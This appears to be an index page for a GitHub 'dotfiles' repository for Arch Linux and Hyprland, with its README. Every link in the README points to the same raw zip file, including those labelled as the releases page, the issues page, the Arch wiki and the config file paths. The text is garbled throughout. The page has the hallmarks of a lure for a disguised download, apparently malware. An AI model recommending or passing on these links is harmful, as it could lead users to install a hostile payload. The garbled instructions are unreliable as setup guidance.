https://github.com/selen525/dotfiles
ποΈ Craft your ideal Linux desktop experience with these organized and customized configuration files for seamless setup and optimal performance.
https://github.com/selen525/dotfiles
awesome containers docker dotfile dotfile-management dotfiles dotfiles-linux dotfiles-resources encryption fish gpg list makefile multiple-machines oh-my-zsh shell template yadm
Last synced: 19 days ago
JSON representation
ποΈ Craft your ideal Linux desktop experience with these organized and customized configuration files for seamless setup and optimal performance.
- Host: GitHub
- URL: https://github.com/selen525/dotfiles
- Owner: Selen525
- License: mit
- Created: 2025-09-03T17:52:25.000Z (about 1 month ago)
- Default Branch: master
- Last Pushed: 2025-09-13T03:56:30.000Z (22 days ago)
- Last Synced: 2025-09-13T05:50:42.262Z (22 days ago)
- Topics: awesome, containers, docker, dotfile, dotfile-management, dotfiles, dotfiles-linux, dotfiles-resources, encryption, fish, gpg, list, makefile, multiple-machines, oh-my-zsh, shell, template, yadm
- Language: Shell
- Size: 5.06 MB
- Stars: 1
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# π₯οΈ dotfiles - Simple Setup for Archlinux & Hyprland
[](https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip)
## π Getting Started
Welcome! This guide will help you easily download and run the dotfiles application for Archlinux and Hyprland. Follow the steps below to get started.
## π¦ System Requirements
Before you download, ensure your system meets these requirements:
- Operating System: Archlinux
- A terminal emulator (e.g., Konsole, Terminal)
- Basic knowledge of the terminal for installation## π₯ Download & Install
To get the latest version, visit this page to download: [Releases Page](https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip).
1. Click the link above to access the Releases page.
2. Look for the latest version. It will have the highest version number.
3. Download the `https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip` or another available archive file.
4. Once the download completes, unzip the file to a location of your choice.## βοΈ Configuration
To set up your dotfiles, follow these steps:
1. Open your terminal.
2. Navigate to the folder where you unzipped the dotfiles:
```bash
cd path/to/unzipped/folder
```
3. Copy the dotfiles to your home directory:
```bash
cp -R ./* ~/
```This step will overwrite any existing dotfiles in your home directory. Backup your current dotfiles if needed.
## π οΈ Features
This dotfiles repository includes configurations for:
- **Hyprland:** A modern and customizable window manager.
- **Neovim:** An enhanced version of Vim for text editing.
- **Tmux:** A terminal multiplexer that allows multiple terminal sessions.Each application has its own configuration files that you can customize further as per your needs.
## π Customization
After you copy the dotfiles, you might want to customize them:
- **Neovim Configuration:** Located in `~https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip`. Edit this file to change editor settings.
- **Tmux Configuration:** Found in `~https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip`. Adjust this file to set your preferred terminal parameters.
- **Hyprland Settings:** Located in `~https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip`. Modify this according to your workflow.## π‘ Troubleshooting
If you encounter issues during installation, consider the following tips:
- Ensure you have installed required applications on your system.
- Check file permissions. Ensure the copied files are accessible.
- View the terminal output for any error messages. These can guide you to the specific problem.## π Community & Support
For assistance and community support, you can:
- Visit the [GitHub Issues Page](https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip) for any questions or to report bugs.
- Look for discussions related to Archlinux and Hyprland in forums or chat groups for user-contributed tips.## π Additional Resources
- **Archlinux Wiki:** [Archlinux Documentation](https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip)
- **Hyprland Guide:** Check Hyprlandβs official documentation for advanced setups.
- **Neovim Tutorials:** Numerous online resources are available to learn about Neovim's features and usage.## π Contact
For direct questions regarding this repository, feel free to create an issue on the repository page. Your feedback is important, and we appreciate your contribution to the community.
## β οΈ License
This project is licensed under the MIT License. This means you can modify and distribute it as you like, provided that you include a copy of the original license.